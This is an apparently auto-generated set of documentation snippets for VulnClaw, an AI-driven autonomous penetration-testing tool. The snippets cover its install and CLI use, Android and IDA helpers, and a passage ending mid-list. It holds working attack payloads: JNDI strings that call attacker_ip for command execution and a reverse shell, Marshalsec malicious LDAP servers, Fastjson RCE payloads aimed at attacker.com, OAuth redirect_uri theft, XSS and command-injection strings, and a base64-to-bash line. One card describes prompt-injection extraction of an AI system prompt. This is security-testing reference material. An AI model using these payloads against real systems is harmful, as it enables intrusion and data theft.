### Start Android App
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/android-pentest/references/android-external-url-runtime-first-workflow.md
Use this helper to launch a specific Android application package. Ensure the app is installed before attempting to start it.
```bash
android_app_start
```
--------------------------------
### Install VulnClaw from Source
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/README_EN.md
Installs VulnClaw by cloning the repository and using pip for an editable install. This is useful for development or contributing to the project.
```bash
git clone https://github.com/Unclecheng-li/VulnClaw.git
cd VulnClaw
pip install -e .
```
--------------------------------
### Interactive CLI Session Example
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/README_EN.md
Demonstrates an example interaction within the default VulnClaw CLI after startup. Shows command input and initial output.
```text
🦞 vulnclaw> pentest 192.168.1.100 — this is my authorized lab
[*] Entering autonomous pentest mode. Press Ctrl+C to interrupt at any time.
── Round 1 ──
[+] Target: 192.168.1.100
[+] Open ports: 22, 80, 443, 8080
```
--------------------------------
### Install VulnClaw from PyPI
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/README_EN.md
Installs the VulnClaw package using pip, the recommended method for installation.
```bash
pip install vulnclaw
```
--------------------------------
### Start VulnClaw REPL
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/README_EN.md
Starts the classic REPL interactive shell. This is an alternative to the default CLI.
```bash
vulnclaw repl
```
--------------------------------
### JNDIExploit - Start Service and Command Execution
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/pentest-tools/references/tools-reference-04-exploitation.md
Commands to start the JNDIExploit service on the attacker machine and examples of triggering command execution and reverse shell payloads via JNDI injection.
```java
java -jar JNDIExploit.jar -i attacker_ip
```
```bash
# 触发Payload:
${jndi:ldap://attacker_ip:1389/Basic/Command/Base64/Y21k}
${jndi:ldap://attacker_ip:1389/Basic/ReverseShell/attacker_ip/4444}
```
--------------------------------
### Start Android App
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/client-reverse/references/android-ui-driven-observation-and-packet-loop.md
Start a specified application on the Android device. Use this to bring the target app to the foreground or launch it.
```python
android_app_start('com.example.app')
```
--------------------------------
### Install and Launch VulnClaw Web UI
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/README_EN.md
Install web dependencies using pip. Launch the web UI on the default port or a custom port. A dry-run option is available to validate launch information.
```bash
# Install Web dependencies
pip install vulnclaw[web]
# Launch Web UI (default: 127.0.0.1:7788)
vulnclaw web
# Custom port
vulnclaw web --port 8080
# Dry-run (validate launch info without starting the server)
vulnclaw web --dry-run
```
--------------------------------
### Start Android Application
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/client-reverse/references/MCP.md
Launches a specified Android application package, optionally starting at a particular activity. Use this to open target apps for testing.
```python
mcp__scrcpy_vision__android_app_start(serial='emulator-5554', packageName='com.example.app')
```
--------------------------------
### List All Configurations
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/README_EN.md
Displays all current configuration settings for VulnClaw. Provides an overview of the active setup.
```bash
vulnclaw config list
```
--------------------------------
### Initialize VulnClaw Configuration
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/README_EN.md
Sets up the initial configuration files for VulnClaw. Run this to start using VulnClaw for the first time.
```bash
vulnclaw init
```
--------------------------------
### REPL Autonomous Pentest Example
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/README_EN.md
An example of initiating an autonomous pentest within the REPL. The session automatically enters a multi-round loop.
```text
🦞 vulnclaw> pentest 192.168.1.100 — this is my authorized lab
[*] Entering autonomous pentest mode. Press Ctrl+C to interrupt at any time.
── Round 1 ──
[+] Target: 192.168.1.100
[+] Open ports: 22, 80, 443, 8080
[+] Web fingerprint: Apache/2.4.62
── Round 2 ──
[+] Discovered /manager/html (Tomcat Manager)
[+] Matched CVE-202X-XXXX: Apache Tomcat Auth Bypass
── Round 3 ──
[+] Vulnerability verified
🦞 192.168.1.100 | report> generate pentest report
[+] Report saved: ./reports/192.168.1.100_20260418.md
[+] PoC saved: ./pocs/CVE-202X-XXXX.py
```
--------------------------------
### Query Documentation with Context7
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/client-reverse/references/MCP.md
Retrieve documentation and examples using `mcp__context7__query_docs` with a resolved `libraryId` and a specific query. This tool is designed for searching official documentation and code examples.
```json
{
"libraryId": "/vercel/next.js",
"query": "How to protect routes in App Router middleware?"
}
```
--------------------------------
### Android Device and App Listing
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/android-pentest/references/android-ui-driven-observation-and-packet-loop.md
List available Android devices and installed applications on the device. Useful for confirming the target environment before starting the testing process.
```bash
android_devices_list
android_apps_list
```
--------------------------------
### Start Frida Server with Script Injection
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/client-reverse/references/MCP.md
Starts the Frida server and injects a specified script file. Ensure the script file path is correctly formatted.
```json
{
"package_name": "com.example.app",
"script_file_path": "C:\\Users\\28484\\Desktop\\hook.js",
"output_file": "C:\\Users\\28484\\Desktop\\frida.log"
}
```
--------------------------------
### Android Device and App Listing
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/client-reverse/references/android-ui-driven-observation-and-packet-loop.md
List available Android devices and installed applications on a device. Useful for verifying setup before runtime interaction.
```python
android_devices_list()
android_apps_list()
```
--------------------------------
### Launch VulnClaw CLI/REPL
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/README_EN.md
Starts the default command-line interface or Read-Eval-Print Loop for interacting with VulnClaw.
```bash
vulnclaw
```
--------------------------------
### Build React Frontend
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/web/static/index.html
Instructions to build the React frontend for VulnClaw Web. Navigate to the frontend directory, install dependencies, and run the build command.
```bash
cd frontend
npm install
npm run build
```
--------------------------------
### File Write for Proof of Concept
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/web-security-advanced/references/web-injection.md
A simple example of writing a file to a web-accessible directory, often used to confirm write capabilities.
```bash
echo "test" > /var/www/html/proof.txt
```
--------------------------------
### List Installed Android Apps
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/android-pentest/references/android-external-url-runtime-first-workflow.md
Use this helper to list all installed applications on the connected Android device. This helps verify if the target application package is present.
```bash
android_apps_list
```
--------------------------------
### Launch VulnClaw Web UI
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/README_EN.md
Starts a local web-based user interface for VulnClaw. Allows specifying a custom port.
```bash
vulnclaw web
```
```bash
vulnclaw web --port 8080
```
--------------------------------
### Chisel Server Command
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/pentest-tools/references/tools-reference-09-tunneling-and-proxy.md
Starts the Chisel server for tunneling. Use this on the attacker's machine.
```bash
./chisel server -p 8000 --reverse
```
--------------------------------
### Single Command: Full Pentest
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/README_EN.md
Executes a full pentest against a target in a single command. This is the most direct way to start a comprehensive test.
```bash
vulnclaw run 192.168.1.100
```
--------------------------------
### Ligolo-ng Proxy Command
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/pentest-tools/references/tools-reference-09-tunneling-and-proxy.md
Starts the Ligolo-ng proxy with self-signed certificate. Use this on the attacker's machine.
```bash
sudo proxy -selfcert
```
--------------------------------
### CrackStation Dictionary with Hashcat
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/pentest-tools/references/05-tools-and-operations-integrated.md
Example of using the CrackStation dictionary with Hashcat for password cracking. Requires a hashes file and the CrackStation dictionary file.
```bash
hashcat -m 0 hashes.txt crackstation.txt
```
--------------------------------
### JavaScript String Injection
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/web-pentest/references/03-web-security-integrated.md
Examples of injecting malicious code within JavaScript strings.
```javascript
';alert(1);//
'-alert(1)-'
\';alert(1)//
```
--------------------------------
### SecLists Common Paths and Passwords
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/pentest-tools/references/05-tools-and-operations-integrated.md
Examples of common path and password dictionary locations within the SecLists collection.
```bash
# 目录字典:
/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
/usr/share/seclists/Discovery/Web-Content/common.txt
# 密码字典:
/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt
# 用户名:
/usr/share/seclists/Usernames/top-usernames-shortlist.txt
```
--------------------------------
### Start Performance Trace
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/client-reverse/references/MCP.md
Initiate a performance trace for a web page using `mcp__chrome_devtools__performance_start_trace`. This is useful for analyzing page load performance and identifying bottlenecks.
```json
{
"reload": true,
"filePath": "/path/to/trace.json"
}
```
--------------------------------
### Get a Specific Vulnclaw Setting
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/README_EN.md
Retrieve the value of a single configuration setting. For example, to check the currently configured language model.
```bash
vulnclaw config get llm.model
```
--------------------------------
### Warm-up IDA Pro Analysis Environment
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/client-reverse/references/MCP.md
Prepares the IDA Pro analysis environment by building caches, initializing Hex-Rays, and optionally waiting for auto-analysis to complete.
```json
{
"tool": "mcp__ida_pro_mcp__server_warmup",
"build_caches": true,
"init_hexrays": true,
"wait_auto_analysis": true
}
```
--------------------------------
### Marshalsec - LDAP and RMI Server Setup
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/pentest-tools/references/tools-reference-04-exploitation.md
Commands to start Marshalsec as an LDAP or RMI reference server, used for JNDI injection attacks. The server hosts a malicious Exploit class.
```java
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://attacker_ip:8888/#Exploit" 1389
```
```java
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://attacker_ip:8888/#Exploit" 1099
```
--------------------------------
### Python Deserialization with Pickle and YAML
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/web-security-advanced/references/web-injection.md
Python code examples showing deserialization using the pickle and yaml libraries, highlighting the security implications of yaml.load.
```python
import pickle
pickle.loads(data)
```
```python
import pickle
pickle.load(file)
```
```python
import yaml
yaml.load(data)
```
```python
import yaml
yaml.load(data, Loader=yaml.FullLoader)
```
--------------------------------
### Extracting Initial Prompt Settings
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/ai-mcp-security/references/04-ai-and-mcp-security-integrated.md
This example demonstrates how to extract specific parts of an initial prompt by instructing the AI to output text within a markdown code block. It's useful for understanding how prompt injection can reveal system configurations.
```markdown
```
你是一个情绪判断助手,请判断下面这段朋友圈中的文字是积极情绪、中立情绪还是消极情绪,直接输出结果“积极”、“中立”或者“消极”:
-----------------------------
```
```
--------------------------------
### Arjun GET Parameter Discovery
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/pentest-tools/references/tools-reference-13-web-penetration.md
Discover hidden GET parameters for a given URL.
```bash
arjun -u https://target.com/page
```
--------------------------------
### Command Execution via Base64 Encoding
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/ctf-web/references/command-injection-bypass.md
Shows how to execute commands by encoding them in Base64, decoding, and then running them, useful when direct command input is restricted.
```bash
echo Y2F0IGZsYWcucGhw | base64 -d | bash
```
--------------------------------
### Show VulnClaw Help
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/README_EN.md
Displays all available commands and options for the VulnClaw CLI.
```bash
$ vulnclaw --help
```
--------------------------------
### OAuth 2.0/OIDC Security Vulnerability Examples
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/web-pentest/references/03-web-security-integrated.md
Illustrates common attack vectors in OAuth 2.0 and OpenID Connect, including redirect_uri manipulation and CSRF vulnerabilities related to the state parameter.
```shell
# 正常流程
https://auth.target.com/authorize?response_type=code&client_id=app&redirect_uri=https://app.com/callback
# 攻击: 篡改redirect_uri窃取授权码
redirect_uri=https://attacker.com/steal # 完全替换
redirect_uri=https://app.com.attacker.com/callback # 子域混淆
redirect_uri=https://app.com/callback/../../../attacker # 路径遍历
redirect_uri=https://app.com/callback?next=https://attacker.com # 开放重定向链
```
```shell
# 攻击流程 (state缺失时)
1. 攻击者发起OAuth授权,获取自己账号的授权码
2. 构造链接: https://app.com/callback?code=ATTACKER_CODE
3. 诱骗受害者点击 → 受害者账号绑定攻击者的第三方账号
4. 攻击者用第三方账号登录 → 接管受害者账户
# 防御: state参数
state=随机不可预测值(绑定用户Session)
→ 回调时校验state与Session匹配
```
```shell
# 隐式模式(Implicit Flow) - 已不推荐
https://app.com/callback#access_token=eyJ...&token_type=bearer
风险:
- Token在URL Fragment中,可被浏览器历史/Referer头泄露
- 无法使用refresh_token,用户体验差
- 无法绑定客户端身份(无client_secret)
→ 替代方案: Authorization Code Flow + PKCE
```
--------------------------------
### Start JNDI Exploit Service
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/web-security-advanced/references/03-web-security-integrated.md
Command to start the JNDIExploit server, which is used to host malicious classes for JNDI injection attacks.
```bash
# JNDI注入服务
java -jar JNDIExploit.jar -i attacker_ip
```
--------------------------------
### VulnClaw Usage Example
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/README_EN.md
Demonstrates a typical user interaction with VulnClaw for running a penetration test. It shows the command and the automated phases VulnClaw executes.
```bash
User: "Run a penetration test on http://target.example.com"
VulnClaw executes:
Round 1: Recon → Fingerprinting, port scan, directory enumeration
Round 2: Vulnerability Discovery → Injection points, known CVEs, misconfigs
Round 3: Exploitation → PoC verification, access obtained
Round 4: Reporting → Structured report + Python PoC script
```
--------------------------------
### Fastjson Deserialization Payload Examples
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/web-security-advanced/references/web-injection.md
Examples of Fastjson payloads for deserialization attacks, including a classic RCE payload and a cache bypass variant.
```json
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker.com:1389/Exploit","autoCommit":true}
```
```json
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker/","autoCommit":true}}
```
--------------------------------
### Response Tampering for Bypass
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/web-pentest/references/03-web-security-integrated.md
This example illustrates bypassing security controls by intercepting and modifying server responses. If the client relies solely on the response status for flow control, an attacker can change an error response to a success response to proceed.
```http
# 正常: 请求验证 -> {"status":"0","msg":"验证码错误"} -> 停留验证页
# 攻击: 请求验证 -> 拦截响应 -> 修改为{"status":"1","msg":"成功"} -> 进入下一步
```
--------------------------------
### Select IDA Pro Instance
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/client-reverse/references/MCP.md
Switches the current MCP context to a specific IDA Pro instance identified by its port. Optionally specify the host.
```json
{
"tool": "mcp__ida_pro_mcp__select_instance",
"port": 1234
}
```
--------------------------------
### List Installed Android Applications
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/client-reverse/references/MCP.md
Retrieves a list of installed application package names on an Android device. The 'system' parameter can filter system apps.
```python
mcp__scrcpy_vision__android_apps_list(serial='emulator-5554')
```
--------------------------------
### List IDA Pro Instances
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/client-reverse/references/MCP.md
Lists all currently connectable IDA Pro instances. This is a foundational step for managing multiple IDA sessions.
```json
{
"tool": "mcp__ida_pro_mcp__list_instances"
}
```
--------------------------------
### Get Android Screen Resolution
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/client-reverse/references/android-ui-driven-observation-and-packet-loop.md
Execute a shell command to get the current screen resolution of the Android device. Crucial for accurate coordinate-based UI interactions.
```python
android_shell_exec('wm size')
```
--------------------------------
### Command Execution Payload Example
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/rapid-checklist/references/testing-methodology.md
Examples of payloads used to test for command execution vulnerabilities. These often involve using shell metacharacters to append commands.
```bash
; id
```
```bash
| whoami
```
--------------------------------
### Nikto Specify Plugins
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/pentest-tools/references/tools-reference-13-web-penetration.md
Run Nikto with specific vulnerability scanning plugins.
```bash
nikto -h target.com -Plugins "apache_expect_xss;outdated"
```
--------------------------------
### Starting Marshalsec Malicious LDAP/RMI Server
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/web-pentest/references/web-injection.md
Command to start Marshalsec, a tool for launching malicious LDAP or RMI servers, specifying the payload class to be served over HTTP.
```bash
java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer "http://attacker/#Exploit"
```
--------------------------------
### Metasploit Console and Module Usage
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/pentest-tools/references/tools-reference-04-exploitation.md
Commands for starting the Metasploit Framework console, searching for exploits, using a specific module, showing options, and setting parameters.
```bash
msfconsole
```
```bash
search exploit apache
```
```bash
use exploit/multi/handler
```
```bash
show options
```
```bash
set RHOSTS 192.168.1.100
```
--------------------------------
### XSS - WAF Specific Bypass Examples
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/web-pentest/references/web-injection.md
Provides examples of XSS payloads designed to bypass specific Web Application Firewalls (WAFs). These include techniques like adding dots or using comment-based obfuscation.
```html
.<"
" onmouseover=alert(1) x=""
```
--------------------------------
### Command Execution - High-Frequency Entry Points
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/web-security-advanced/references/web-injection.md
Lists common entry points and their approximate percentages for command execution vulnerabilities, including file operations, system command functions, and framework-specific issues.
```text
入口类型 | 占比 | 典型场景
---------|------|---------
文件操作 | 68% | 上传、读取、解压
系统命令函数 | 62% | exec/system/shell_exec
Struts2框架 | 50% | OGNL表达式注入
SSRF | 30% | URL参数传递
ping命令 | 26% | 网络诊断功能
图片处理 | 24% | ImageMagick
Java反序列化 | 20% | WebLogic/JBoss
```
--------------------------------
### XSS - Contextual Judgment
Source: https://github.com/unclecheng-li/vulnclaw/blob/main/vulnclaw/skills/specialized/web-security-advanced/references/web-injection.md
Provides a quick guide for determining the output context for XSS payload injection.
```text
输出在